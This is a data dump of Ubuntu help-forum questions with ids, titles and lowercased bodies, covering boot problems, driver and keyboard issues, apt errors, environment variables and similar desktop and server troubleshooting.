' ... umounting and removing '/media/winusb_target_1407629458_2779 ' ... edit 2 : when i use unetbootin , the download completes and asks me to reboot . when i reboot and go into bios , the usb does n't show as a bootable option . it 's just not there . it should be noted that my computer came with windows 8 pre-installed . would that make a difference ? i also ca n't change uefi to legacy from bios .
509207	how to boot ubuntu 14.04 with grub4dos ( rmprepusb )	after downloading the ubuntu 14.04 , i need run/install it from a bootable flash drive . i have a bootable pendrive , with grub4dos , and i was looking for someone who had posted the command to run / install ubuntu 14.04 , from a pendrive in this condition ( prepared with rmprepusb ) , but did not find . now , watching the folders of the ubuntu 14.04 iso file , i saw that the ubuntu.seed file was moved , so i could not execute it with the old command that is shown in the tutorials on rmprepusb website . so , i am posting here the command to use the grub4dos to boot ubuntu 14.04 from a usb flash drive ( already prepared with rmprepusb - executable for windows only ) . code at end of this post . note : it does n't works with ubuntu 12.04 or less . ( need more info if works or not with ubuntu 13 ) . attention : change the path from `` /boot/linux/ubuntu14.04.iso '' to your ubuntu iso file path . ( text above translated from portuguese with google ) ( em português ) depois de baixar o ubuntu 14.04 , preciso executa-lo a partir de um pendrive bootável . eu tenho um pendrive bootável , com grub4dos , e eu estava procurando por alguém que tivesse postado o comando para executar / instalar o ubuntu 14.04 , a partir de um pendrive nessa condição , mas não encontrei . agora , observando as pastas do arquivo iso do ubuntu 14.04 , eu vi que o arquivo ubuntu.seed mudou de local , então eu não poderia executá-lo com o comando de boot antigo que consta nos tutoriais do site rmprepusb . então , eu estou postando aqui o comando para usar o grub4dos para bootar o ubuntu 14.04 a partir de um pendrive usb ( já preparado com rmprepusb - executável somente para windows ) . obs . : não funciona com ubuntu 12.04 ou menor . ( carece de informações sobre se funciona com ubuntu 13 ) . atenção : altere o caminho de `` /boot/linux/ubuntu14.04.iso '' para o local onde está o seu arquivo iso do ubuntu . code : title run ubuntu 14.04 find -- set-root /boot/linux/ubuntu-14.04.1-desktop-amd64.iso map /boot/linux/ubuntu-14.04.1-desktop-amd64.iso ( 0xff ) || map -- mem /boot/linux/ubuntu-14.04.1-desktop-amd64.iso ( 0xff ) map -- hook root ( 0xff ) kernel /casper/vmlinuz.efi file=/preseed/ubuntu.seed noprompt boot=casper iso-scan/filename=/boot/linux/ubuntu-14.04.1-desktop-amd64.iso quiet splash -- initrd /casper/initrd.lz more information : http : //www.rmprepusb.com/tutorials/grub4dos thanks and sorry for english errors ... . : d
509210	adding firmware to ubuntu usb through windows	i have a cubox-i4pro , ( http : //www.solid-run.com/ ) and i need to add a firmware package to /usr/lib . i ca n't write to the partition on my windows because it does n't use the same file system and windows assumes that my microsd is corrupt . ubuntu wo n't allow me to add the files because i am not the owner of the microsd ( even though i am ) . it says that the creator is `` root '' and i ca n't enter a password or anything to allow me to access the files . now i have a couple of programs that allow me to view linux partitions on my windows computer , but not write to the linux partitions . i ca n't use ubuntu until i get the wi-fi firmware put on the microsd . does anybody know how to write files to a linux disk using windows or extract the files using the terminal/kernel i get on boot ? thanks ! edit : the password for the user `` root '' is cubox . also , it starts in a kernel and currently has no desktop . ( this is what i 'm trying to download after i fix the wi-fi ) edit : is it possible to extract the files using the terminal ? because that 's all i have . i have no desktop installed yet . or i wonder if i could put a desktop client on a usb and install it from the external device . this has been such a mess anybody that can give me any advice please do so . : ) thanks !
509213	hide windows toolbar maxed without metacity	i 'm trying to do this tutorial in my ubuntu 14.04. but when i go to gconf-editor - > apps/metacity/general i get an error saying this path does n't exist . so what is the correct path ?
509215	how to detect the encoding of a file ?	i have subtitles files , .srt i want a quick way to detect their encoding so i can tell devede what is their encoding so it can burn them correctly it would be nice to have a recursive script that searches for all the .srt in a given directory , then show the encoding of each file and save it in encoding.txt
509217	starting x server on remote display without starting it on local display	if i have a mounted ubuntu image . how to start its gui on my rooted android device via a vnc client without starting it directly on my display ( because that will send android out ) ?
509218	how to install clang++ ?	i 'm having trouble getting clang++ to work as i compile my code . specifically , i 'm getting a make : clang++ : command not found error . i 've run sudo apt-get install llvm , and also sudo apt-get install build-essential and sudo apt-get update . what do i have to do to get clang++ installed ?
509220	upon log in , will not fully boot	clean install of ubuntu 14.04 ... upon first boot , all is well . no problems to report . on the 2nd log in , is where trouble begins . sometimes ( no particular pattern ) , the computer will get to the log in screen . sometimes , the ubuntu loading screen never resolves . when it does load : unity does not load anything in its search or applications lists . unity will open , but nothing occurs . terminal does not respond to commands . terminal windows ( and even tty1-6 ) do absolutely nothing when commands are issued . left side taskbar `` works '' , and launches tasks , but they quickly freeze and need to be force quit to get rid of them . desktop background does not and will not load . i have done the following tests so far : deleted all settings in /home partition to ensure this was not the problem tried to narrow down if an app was misbehaving - on the latest iteration , only installed chrome and vlc , problem still occurs . how should i proceed ?
509222	how to completely disable english ( us ) keyboard so that switcher does n't notice it ?	i would like to completely disable the english ( us ) keyboard , so that i can use english ( dvorak ) everywhere . the reason i 'm concerned about this is that there 's a new hotkey for switching between input methods : for example , it is mentioned in this question : where to change default < super > + < space > keyboard switch key by a terminal ? and this bug report : https : //bugs.launchpad.net/ubuntu/+source/gnome-screensaver/+bug/1244548 for my use case , i simply do n't want to be bothered with switching ( i use dvorak all the time ) . i 'll note that disabling the hot keys and selecting one keyboard seems to work just fine under unity ! however , changing to a binding other than super+space does not seem to have any effect under ratpoison . ( the binding is actually associated with the keys control+space on my computer , which does not play nicely with emacs . ) i have also removed all other input sources from gnome-control-center , but clearly english ( us ) is not really completely gone .
509224	can not find server options in eclipse	os ubuntu 14.04 i 've installed eclipse version : luna release ( 4.4.0 ) . server : tomcat7 when i navigate to : window > > preferences , there is no option for configuring server . how can i get tomcat7 in eclipse ? cat /etc/tomcat7/tomcat-users.xml < tomcat-users > < role rolename= '' manager-gui '' / > < role rolename= '' role1 '' / > < user username= '' tomcat '' password= '' tomcat '' roles= '' manager-gui '' / > < /tomcat-users > cat /etc/default/tomcat7 tomcat7_user=tomcat7 tomcat7_group=tomcat7 java_home=/usr/lib/jvm/openjdk-6-jdk i changed the value of tomcat7_user to tomcat as in tomcat-users.xml , but then when i started tomcat it shows me error : service tomcat7 start * starting tomcat servlet engine tomcat7 start-stop-daemon : user 'tomcat ' not found when i change this to tomcat7 , i can start and stop my tomcat7 server . i do n't know what i am missing . is this due to file permission issues . please help me . thanks !
509227	how to create a wap in lubuntu ?	i am using lubuntu 14.04.1. and my notebook is lenovo thinkpad e531-6885 erg , i am connected to the internet through wire ( eth0 ) , and i guess it must work because under windows 7 with mypublicwifi it just flows amazingly . so what do i need to do ? btw : the device which should i be able connect is nexus 7 ( 2013 ) thanks in advance
509228	locked apt-get directory	i downloaded pipelight using the following commands : sudo apt-add-repository ppa : pipelight/stable sudo apt-get update sudo apt-get install -- install-recommends pipelight-multi sudo pipelight-plugin -- update my apt-get is now locked . i can not download or remove applications either by command line or software center , in ubuntu . please help .
509233	ubunu 14.04 with virtualbox wo n't load past login screen	i 've installed ubuntu 14.04 inside virtualbox running under a windows 8.1 host . when i run the vm and log in , ubuntu becomes stuck . there is keyboard interaction and i can only move the cursor around . only the desktop wallpaper is displayed . after idling for a while , sometimes an error will pop up saying there is a problem with /usr/bin/compiz with the message `` sorry , ubuntu 14.04 has experienced an internal error '' . i can not do anything with this error . also , there is sometimes an dialog box saying `` your system is providing 3d via software rendering rather than hardware rendering . this is a compatibility mode which should display 3d graphics properly but the performance may be very poor . if the problem you 're reporting is related to graphics performance , your real question may be why x did n't use hardware acceleration for your system . '' i have tried to install guest additions , but i can not do this because i have no shell/gui access . i have tried to add the guest additions .iso file alongside the ubuntu .iso before running the vm , but to no avail .
509234	are raring arm packages available someplace ?	i neglected to update my arm system from raring to saucy in time . now i ca n't install update-manager-core ; things are missing . is there a way to manually update sources.list to point to some sort of archive so that i can get the update to saucy ?
509241	how to securely erase solid state drive in netbook running ubuntu	i want to sell ( or donate ) my hp mini 1000 netbook , but i am concerned about identity theft and securing personal information with the transition to a new user . i am running ubuntu 12.04 lts . the netbook has a 16 gb solid state drive . i am under the impression that different methods are required to securely erase an ssd , compared to a traditional hard drive . how do i do this and prepare this computer for sale ( or donation ) ? it is not important whether the computer can still boot the operating system after this erase - only that an operating system can again be installed . i have tried to read about this in many places on the web , including in askubuntu , but the process is never explained in sufficiently clear , jargon-free language . or perhaps it is , but i still do n't understand how to do this ! can i do this without procuring software ? if i need to get software , what should i get ? essentially , can anyone explain how i do this to someone who , you can assume , knows very little about computers , but can competently follow directions ? thanks in advance !
509242	upgrading raring to saucy on arm	do-release-upgrade gets me : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/saucy/main/binary-armhf/packages http : //ports.ubuntu.com/dists/saucy/ has the right stuff in it . why does n't do-release-upgrade find what it needs ? this is after i edited sources.list to point to the archives . here is the complete content of my sources.list . there is nothing in sources.list.d . deb http : //old-releases.ubuntu.com/ubuntu raring main universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu raring main universe multiverse deb http : //old-releases.ubuntu.com/ubuntu raring-updates main universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu raring-updates main universe multiverse that is how i got the update manager to install in the first place . of course , pretty clearly do-release-upgrade has it 's own ideas of where to look for things that have nothing to do with the starting contents of sources.list .
509244	alt and prt scr keys not working	recently afer installing kubuntu 14.04 and gnome 3 on top of that , everything works fine , but my alt and prt scr keys are not working . previously i have installed ubuntu 14.04 and due to some reason i had to format my hdd and install kubuntu . i tried xev to find keycodes of the alt key but there is no response , it looks like these keys become dead . but how can keys became dead while 2 days before they were working fine ? i guess it may be reason due to some sort of graphics card problem . recently i got a dual graphics card laptop . most of time i keep graphics mode to dynamic but now i changed it to fixed mode . after booting that alt and prt scr keys worked for a while and after some clicking on these keys they just again do n't work .
509245	what is the third-party software on ubuntu 14.04	and how does it improve my experience or make it easier on me as a user if i choose to use the third-party software
509247	why everything is reverted back in path env variable after reopening shell ?	as far as i know path is not a temporary variable . and when you reopen your terminal it should work as before . in my case it 's not . what i do is to add another path to $ path : export path= $ path : /usr/local/go/bin it should append go dir to path variable and it does do that , but when i reopen terminal and echo $ path my last appended path is cleared and i have my paths without /usr/local/go/bin at the end . what is the reason this is happening ? is there something i 'm doing wrong ?
509248	why ca n't i adjust partition size precisely with parted ( kde partition manager ) ?	context : i want to clone my kubuntu 12.04 ( the pustulated priapulid ) installation from one logical volume to another , prior to doing a dist-upgrade to 14.04 ( the teratogenic tardigrade ) on the original . these two logical volumes were created the same size , or so i thought , using one of the parted frontends ( probably a gparted live cd ) a few years ago , but now i have discovered that there is a difference of about a megabyte in their sizes , which prevents clonezilla from writing an image taken from the larger one onto the smaller one . ( cloning from the smaller onto the larger one worked fine , a couple of years ago , when i still had no idea they were n't exactly the same . the procedure is described here . ) specifically , sda5 and sda7 were created as ~15.62 gib logical partitions , in the same extended partition on a wd 298.1 gib rotary hard drive , but their exact sizes are respectively 16,775,118,848 bytes and 16,774,070,272 bytes ; sda7 is 1,048,576 bytes ( exactly 1 mib ) smaller than sda5 . kde partition manager ( 1.0.3 ) has the ability to change the size of a partition in increments of 1 mib , but when i queue the operation of moving the start of the next logical partition forward ( `` to the right '' ) by 1 mib to make room , it describes this under pending operations as '' move partition '/dev/sda8 ' to the right by 0.99 mib and shrink it from 9.76 gib to 9.76 gib '' and offers no additional mebibyte of space to expand /dev/sda7 into . indeed , it wo n't allow me any latitude to expand sda7 until i have it shrink sda8 by 8 mib ( which becomes `` move partition '/dev/sda8 ' to the right by 8.83 mib and shrink it from 9.76 gib to 9.75 gib '' ) ; then when i tell it to add 1 mib on the end of sda7 it queues the operation `` move partition '/dev/sda7 ' to the right by 4.58 mib and grow it from 15.62 gib to 15.63 gib '' . question : why is parted behaving this way ? is its seeming perversity actually the result of its respecting some underlying structure which it nevertheless ought to be telling me about ? or is it just evil ? and if it is in fact possible and okay to do what i 'm trying to do -- -viz. , make sda7 exactly the same size as sda5 -- - , how can i do it ? ( at worst , would executing the pending operations reliably have this effect ? )
509249	ubuntu 14.04 booting problem with several errors	i am using ubuntu 14.04.01 and suddenly yesterday when i want to open my os as usually first it came up with grub-rescue error . i restarted my laptop after five minutes and this time it was given me different error . i am not aware of this error and any help will be appreciated . thank you . here is the link of screenshot which contains my error message .
509251	permissions when running second level script	evening everyone , i have 1 bash script that starts the program motion ( some may be familiar with ) . motion links to a script in the motion.conf upon picture save or file save to a perl script that sends a pic . all this is good and works great when ran individually . the first script starts motion . if motion is started from the cli then the script to send the email works . when i create a launcher to run the motion_start script , it will no longer send out an email ( get a sendmail not configured error ) . so , i am thinking that the permissions i am using in the script are not correct . i have tried : pkexec , gksudo , sudo written it in bash and in perl , both have the same results thanks for any help ! below are the scripts startup # ! /usr/bin/env bash check_process ( ) { [ [ `` $ 1 '' = `` '' ] ] & & return 0 [ [ `pgrep -n $ 1` ] ] & & return 1 || return 0 } check_process `` motion '' if [ [ $ ? -eq 0 ] ] then # eval `` gksudo echo 'start ' '' # sleep 5m pkexec 'motion -c /home/bulsatar/.motion/motion.conf' firefox http : //localhost:8081/ > /dev/null & else pkexec killall motion killall firefox > /dev/null fi trigger for email in .motion/motion.conf : on_picture_save /home/bulsatar/bin/'motion setup files'/motionsend.pl -p % f happy to share the perl script but not sure if it is needed ? ( on a side note , perl is waaaaay easier to use than bash ! ! ! for me . )
509252	run a thinapp sandboxed portable app in wine	is there a way to run at wine portable applications that run in sandboxes like those build in vmware thinapp ? i ca n't run in wine anyone .
509257	how to install `` reliance 3g '' usb dongle in ubuntu 14.04	hello ubuntu community , please give instructions to use reliance 3g usb dongle in ubuntu 14.04 . i 've tried various methods on web / ubuntu forum / ask ubuntu , but they are not working for me . please help . thanks
509258	`` no suitable download server found ''	i bumped into the problem that i ca n't download any updates or new packages . i had this problem before which i could solve through several steps sudo rm /var/lib/apt/lists/* -vf sudo apt-get clean sudo apt-get update this gives me still a w : failed to fetch http : //ucmirror.canterbury.ac.nz/ubuntu/dists/quantal-security/multiverse/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i tried a different server by hand , and get a 'no suitable download server found ' when i ask ubuntu to find one for me . i am not behind a firewall , there is no proxy server set up in the settings or anything like that .
509259	how do i access the recovery menu	i want to change my root password but i am not able to access the recovery menu . i followed the steps given here . i choose the advanced option from the grub menu and then the recovery mode , but after that ubuntu loads the gui mode with a guest session . how do i access the recovery menu so i can change my root password ?
509260	ca n't type korean in lubuntu	i understand that this is a question asked alot , but i have tried every solution , and i am still unable to type korean so , i have a samsung netbook , bought in us , so a us keyboard , but i am a korean and i know korean so i do n't need a korean keyboard . i just want it to type . i installed lubuntu , and these are the things i have done . i went to language support , got korean , went to keyboard input methods , and added korean-korean ( 101/104 key compatible ) with ibus , but when i typed ctrl + space , the symbol at the bottom left of the taskbar , goes from us to kr but even when in kr english types , not korean ... i tried getting im-switch ? and imhangul , but did n't work i tried with the lxkeymap , but that just did the same thing basicallly , my problem is that even with korean installed , and setup in the input method , when i type , english comes out instead of korean.. does anyone know another alternative method i can try ? thank you
509262	@ symbol and `` swapped on keyboard	i 've very recently installed ubuntu 14.04 ( on a dell latitude 640m with xp professional in a separate partition ) and the two symbols @ and `` have swapped positions on the keyboard ( i chose uk language setup ) . i have a full size separate logitech keyboard , and the swapped key fault also occurs on my laptop keyboard . i tried two fixes suggested in another post : ibus-setup and dconf tool . ticking the recommended box in the ibus setup did n't have any effect . when i opened the dconf editor it did n't seem to work as no options come up when i click on any menu items . i tried reinstalling ( using synaptic device manager ) but no change . thanks for any help . finding my way around ubuntu is a steep learning curve .
509265	installing windows after ubuntu	i have a new laptop ( it has no cd drive ) with ubuntu installed and would like to have windows installed now as dual boot . i would like to know whether it is possible to do the same . or do i have to install windows and install ubuntu back as installing windows will erase mbr ? ( the good part is that there are no important files , yet as it is a new system )
509266	how to build .deb package for ubutnu	i have written some shell scripts.i want to pack them in a debian package to be used for ubuntu.so i need to know how to build a debian binary package.please tell me the proper steps to be followed and if there are any suitable link for that , please suggest me.thanks in advance .
509268	how to change behaviour of a specifed keyboard key with another key ?	my keyboard does n't have right-ctrl key . does anyone know how can i change the behaviour of my insert key to do the operation of right-ctrl key ? i use this : how do i remap certain keys or devices ? and then xmodmap -e `` keycode 118 = control_l '' this change inser behavior but not same as ctrl , now insert do anything !
509270	trouble while using wireshark	i have installed wireshark successfully.but in that no interface option is available.it shows a message as no interface can be used for capturing in this system with the current configuration
509273	graphics info not recognized in system info after updating	i have updated hardware package but after installing this package system info not showing graphics detail .
509274	how do i set environment variables through a keyboard shortcut ?	i have a script that increments an environment variable , but it only works if i run it by perpending it with `` source '' or with a `` . '' . unfortunately , this means that if i attempt to bind it to a key , i ca n't seem to use `` source '' modifier , thus the environment variables do n't actually change . ( assuming an integer test already exists within shell environment ) : # ! /bin/bash let `` test= $ test+1 '' echo $ test export test= $ test ideally this script would increment the test variable , but ( if i understand this right ) it only does so in the `` sub-shell '' environment that this scripts spawns when it is run . is it possible modify an environment variable in this way without using `` source '' ? if not , how else could i accomplish my goal ? i 'd appreciate any help , thanks !
509279	amd hd 4200 for ubuntu 14.04+ driver troubleshooting questions	first of all , apologies for the detailed question ( s ) but i have been googling my _ off , and i cant seem to find answers . i have a computer with integrated amd hd 4200 card . my question is : what is the best performing option to me ? 1a . i read somewhere about modified ( `` hacked '' ) drivers to work on 14.04 . where can i find this information ? ( even if `` not recommended '' 1b . modify xserver to work with the drivers ? where can i learn how ? 1c . stay on ubuntu 12.04 because the official legacy drivers perform better ? 1d . upgrade to 14.04 because the performance is equal to the open source ? i installed 12.04 as i understand about the driver from amd ... amd catalystâ˘ 13.1 proprietary linux x86 display driver 13.1 1/21/2013 description : automated installer and display drivers for xorg 6.9 to xserver 1.12 and kernel version up to 3.4 2a . does this mean that i can use the driver on any ubuntu release as long as the xserver version is = > 1.12 ? 2b . or does ubuntu 14.04 require a base version ?
509280	how to build a wifi network on an android tablet	i went to the settings and set a network but the network was failing to to tether with hotspot to my blackberry playb么貌k via a notification failing to connect to the server , what must i do ?
509281	wubi ignores .iso file and downloads from beginning in ubuntu 14.04	wubi.exe used to work fine with earlier versions of ubuntu , but there is some issue with wubi for 14.04 . i used to install ubuntu along with windows as an add/removable program . when both files ( wubi.exe and iso ) placed in the same folder and wubi was run , the whole process did n't take more than 1-5 minutes to complete . but this is changed in ubuntu 14.04 , i did the same process . 1-downloaded iso file . 2-extracted wubi.exe from iso . 3-placed that wubi and iso in the same folder . 4-run the wubi.exe . this is the same process that worked for earlier versions , even in 13.10 ; but in 14.04 , wubi totally ignores the iso image and starts to download it again . it means i have to wait for almost 1 gigabytes to download every time when i try to install ubuntu 14 along with windows . i searched a lot but ca n't find the satisfactory answer . there are opinions but it seems those answers and help is not based on experience but opinions only . so please answer it after trying it out yourselves . thanks .
509283	python : no module named datetime ?	os : ubuntu 14.04 lts python : 2.7.6 my installation of gourmet recipe manager suddenly stopped loading . when i run it in a terminal window , i get the following at the end of the traceback : import datetime as dt importerror : no module named datetime so far as i can tell , nothing has been changed and my python installation is up to date . it simply quit working yesterday . i 'd certainly appreciate a good approach to diagnose and fix this problem ! update : thanks to all who replied ! tim , i 'm sorry if i asked this question in the wrong place . please chalk it up to being a new guy simply following the links from the ubuntu website . theschwa , i tried your suggestion and got the same error message as above . muru , the package seems to be installed , but i have no idea if it 's installed/configured correctly . how might i find out ? i 'm sorry for all the questions , but i 'm an old redhat guy who has been away from linux for some time . all of the apt/dpkg stuff is new to me .
509286	how to copy or ( quickly-and-easily ) backup a `` special file '' ?	wanting to try this unverified answer for this unanswered question , but not without some kind of quick-and-easy backup . thought copy-and-paste of the /dev/bus/usb/004 folder would do the trick , but that does n't work ( yet ) , as its contents ( 001 and 002 ) appear to be `` special files '' which can not be simply copied : ca n't copy special file any idea how to quickly backup ( and/or copy-paste ) such files ? would you expect different behaviour of command line vs. nautilus/gui ? related but different : enable copying of special files in gui .
509287	block mobile , tablet from accessing internet	i have installed ubuntu 14.04 server as my internet gateway , with dhcp and squid proxy . i have wired and wireless connections now going through this server , and hence now fully monitored and controlled . now i want to restrict or block internet access to mobiles and tablets , while allowing computers and laptops to access internet wired or wireless . ! can i do this through dhcp server or squid proxy or any other means ?
509289	gamma correction with upstart and a script	i 've written an upstart job to automatically change display gamma according to change in display brightness : start on ( backlight-device-changed ) exec /usr/bin/gammach and this is `` gammach '' : # ! /bin/bash br=`cat /sys/class/backlight/acpi_video0/actual_brightness` # display brightness gm=. $ ( ( ( ( br+76 ) % 100 ) ) ) # corrected gamma according to brightness xrandr -- output lvds -- gamma $ gm : $ gm : $ gm but every time i change brightness i receive this error in the log file : ca n't open display i have tried xgamma , but received a similar error . any help appreciated . thank you .
509291	ssh process started by default	as soon as log into the system , i can see the following ssh processes . root 1899 1 0 12:35 ? 00:00:00 /tmp/.sshdd1407654346 root 1904 1899 0 12:35 ? 00:00:00 /tmp/.sshdd1407654346 root 1905 1904 0 12:35 ? 00:00:00 /tmp/.sshdd1407654346 root 1907 1904 0 12:35 ? 00:00:00 /tmp/.sshdd1407654346 root 1909 1904 0 12:35 ? 00:00:00 /tmp/.sshdd1407654346 is this some sort of virus ? how to get rid of it ? as soon as i login to the system as a normal user and do 'ps -ef | grep ssh ' , i get the above output . as you can see , the process 1899 is started by 'init ' ( pid = 1 ) . i tried to kill these processes using the root login but they just start again .
509292	how to set user_subvol_rm_allowed capability ?	i try to remove btrfs snapshot as a normal user . i 've read , that a user needs to have some special capability/right set : user_subvol_rm_allowed . how to grant such capability to user ? ?
509294	failure in installing gamit globk software	i am a beginner in ubuntu . i was trying to install gamit globk software in my system . from previous installation experiences from others i found that i had to install x11 libraries and headers and i installed it . also i already have csh installed . while running the installation software i encountered with this messages : /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : skipping incompatible /usr/lib/gcc/i686-linux-gnu/4.6 /libgfortran.so when searching for -lgfortran /usr/bin/ld : skipping incompatible /usr/lib/gcc/i686-linux-gnu/4.6/libgfortran.a when searching for -lgfortran /usr/bin/ld : can not find -lgfortran /usr/bin/ld : can not find -lm similarly can not find for -lgcc_s , -lgcc_s , -lquadmath , -lm , -lc etc please help me to fix this and complete my installation . hello again.. i added add-on multilib files and documentation files that solved this problem.. but again another problem came ... and that showed this message ... . /usr/bin/ld : i386 architecture of input file `../../libraries/comlib/com_lib.a ( getdir_gftn.o ) ' is incompatible with i386 : x86-64 output /usr/bin/ld : i386 architecture of input file `../../libraries/comlib/com_lib.a ( getmac_gftn.o ) ' is incompatible with i386 : x86-64 output /usr/bin/ld : i386 architecture of input file `../../libraries/comlib/com_lib.a ( pickfn_gftn.o ) ' is incompatible with i386 : x86-64 output collect2 : ld returned 1 exit status make : *** [ makex ] error 1 please help me to fix this..
509295	ca n't read subtitles nor get the audio language codes in dvd : rip	after updating from an older ubuntu , when i rip dvds with dvd : rip ( to stream them on my tablet ) i have a couple of problems : when i go on the `` read dvd table of content '' i can get the list of language tracks but not the language code they are in ( e.g.. i get '' 1 : 48 khz ch '' but not `` 1 : 48 khz en '' ) ; when i then i have ripped the title on disk and i go to the subtitle tab i ca n't get the subtitles ( `` this title has no subtitles '' ) , while the dvd actually has several subtitle options . any suggestion on what could be the clue ? i have a feeling it 's not a dvd : rip problem , but something more in the background.. /antonello [ ubuntu 14.04 : :64bit ] this is the output of dvd : :rip dependency scan : ( i ca n't find hal in synaptic and i already have rar installed )
509296	after the skype update , on ubuntu 12.04 , it crashes directly after log in .	that 's exactly it . i 've done everything every other forum and google search suggested . ( with the exception of one guy saying to delete the /.skype folder . ) i just could n't find the folder . i 'm at an absolute loss here . i have no idea what to do . every other post i find is from about 2 or more years go . i highly doubt they had the new force-update skype issue as i 'm having .
509298	is it possible to a crontab file containing 1k+ lines of schedules ?	i 'm planning to create scheduled tasks and i want linux to handle those tasks using crontab . note : some tasks have different schedules and some are the same [ crontab file ( schedule.cron ) ] * * * * * /application/monitor -source1 * * * * * /application/monitor -source2 * * * * * /application/monitor -source3 ... * * * * * /application/monitor -source500 * * * * * /application/monitor -source501 * * * * * /application/monitor -source502 ... * * * * * /application/monitor -source1000 * * * * * /application/monitor -source1001 * * * * * /application/monitor -source1002
509300	how to block parts of a website	i already use the hosts file to get rid of entire domains that are time sinks , but some websites that largely are wastes of time ( eg reddit ) have useful parts . so i 'd like to allow www.reddit.com/r/dailyprogrammer but block www.reddit.com/r/all . searching online i have a difficulty finding results that are n't simply editing the hosts file , and as far as i understand that only works for entire domains .
509304	turning off ubuntu one	how do i uninstall the ubuntu one software now it does n't work ? every time i boot up , i get a pop-up saying that my files are being uploaded to the cloud . since they are n't , this stays there for a long time . if i search for `` ubuntu one '' on the ubuntu software centre , i get two hits , but clicking on `` more info '' gives `` there isn’t a software package called “ubuntuone-control-panel-qt” in your current software sources '' . how does it manage to find things which do n't exist ?
509305	call shell script from php when ubuntu 14.04 ( rightly ) disables the shell for www-data	i just migrated from 12.04 to 14.04 . 14.04 ( sensibly ) disables login / shell for www-data . but my php site needs to run some shell scripts to run stuff like kindlegen , rsyncing files to another server at user command etc . whats the best ( most secure ) way to do this ? thanks
509307	problem with mouse pointer/arrow keys in 14.04	recently i updated my ubuntu from 12.04 to 14.04 . my mouse does n't work properly ; if i just click or select an folder with the help of arrow keys , the screen automatically returns to desktop screen and right click also does n't work for me . however , right clicking works in web screen when i am browsing net in firefox .
509308	fixing options after switching to another desktop environment	i am using ubuntu 14.04 ( lts ) and recently installed xubuntu-desktop environment . after switching to xubuntu , there are some option not working like : here following not works : about this computer system settings logout hence , it is required to fix for xubuntu desktop after switching from default ubuntu ( ex . unity-control-center replace with xfce4-settings-manager ) when i click on above options nothing do ! so it should removed/replace ( indicator ) or fixed options .
509309	ubuntu file manager : text input for file names ( with autocomplete )	i use the default ubuntu file manager . sorry , i ca n't give you exact application name , since i could not find it . the german `` about '' messages just says `` dateien '' ( german for `` files '' ) . i do n't see a text input for quick location of files i type with ten fingers and really prefer typing to clicking . is there a way to locate files with the file manager by typing ? autocomplete would be nice , too .
509311	upgrade from 12.04 to 14.04 problems	having some problems ! every time i try perform the update from 12.04 to 14.04 i am met with the following error : kev @ masterpc : ~ $ sudo do-release-upgrade checking for a new ubuntu release err upgrade tool signature 404 not found [ ip : 91.189.91.15 80 ] err upgrade tool 404 not found [ ip : 91.189.91.15 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'quantal.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . in the software centre under software sources i have used both servers ( australian & main server ) but to no avail . my network also appears to be fine !
509313	nautilus slow if lot of images are in a directory	i have 400 images in a directory . i look at the directory with nautilus . the first time i open the directory it is very slow , i have a modern laptop with 4 cores and plenty ram . my use case : open directory containing a lot of images press ctrl++ to make the images larger i want to sort the images to some diretories , or delete some images . result : nautilus is unusable slow . i walked away from the laptop to do different stuff , some time later it was usable . nautilus has 104 % cpu in top . low `` wait '' value in top : disk is not the bottleneck guess : nautilus does create the thumbnails of all images , without nice-level . but all thumbnails are not needed at once . i just looked the first 10 images . nautilus should prefere user input to background thumbnail creation , since user response is more important . multicores hang around idle . my conclusion : if nautilus would use all cores and with a nice value for background stuff , the user would have better responsiveness and the background job would be quicker . question : is there anything i can do to solve this ? maybe a configuration which can i set , or create a bug report for the developers ?
509315	problem with installation of ubuntu server 14.04.1 installation hangs	i have already posted this on the community forum but maybe this is a better place . i 'm completely stalled until i get past this i seem to have fallen at the first hurdle . the installation freezes just before the step for configuring the internet connection . i just get the purple screen - nothing more . i have tried both the i386 and amd64 versions but neither work . the only version i have successfully installed so far is 12.10 . any advice would be gratefully received . philip
509321	downgrade all external packages to the official ones	let 's say i installed bunch of packages from external ppa repositories and they modified or replaced the existing default packages in the system . assume that then i remove those ppas from the apt-sources and i no longer remember their names . so then how do i use ppa-purge or downgrade those packages to the default ones ? is there way i could list/find all the packages installed form non-ubuntu software repositories ? then i could reverts back to the official packages if necessary .
509322	install rabbitvcs for thunar : package thunarx-python missing	on 14.04 trusty , trying to install rabbitvcs from the rabbitvcs-ppa results in the following error : $ sudo apt-get install rabbitvcs-thunar reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : rabbitvcs-thunar : depends : thunarx-python ( > = 0.3.0 ) but it is not installable e : unable to correct problems , you have held broken packages .
509323	how do i uninstall itunes ?	i unsuccessfully installed itunes on ubuntu 14.04 . now i dont seem to be able to uninstall it . right after that my ubuntu software center also crashed and wont relaunch
509325	bootable system	i downloaded the ubuntu os on my toshiba using a cd and usb drives but the ubuntu main screen shuts down halfway through the process . i think my main hard disk is damaged but not sure how to tell . whats my next best option to boot to other than usb ?
509326	ca n't increase mouse sensitivity	i 've got a problem increasing my mouse sensitivty and the cursor moves pretty slow at the moment . i 've tried using that sensitivity slider in the system settings but it does nothing . i found some articles here and found that i might need to lower the value of 'device accel constant deceleration ' , but that 's already at its lowest ( 1.000000 ) . i 've also tried changing the polling rate described here : http : //www.urbanterror.info/forums/topic/21844-howto-changing-mouse-polling-rate-on-ubuntu/ but no difference between 100hz and 500hz . what else can i do ? ubuntu 12.04 , ms intellimouse explorer 3.0 ps : xinput -- list-props 8 | grep accel shows this : device accel profile ( 268 ) : 0 device accel constant deceleration ( 269 ) : 1.000000 device accel adaptive deceleration ( 270 ) : 1.000000 device accel velocity scaling ( 271 ) : 10.000000
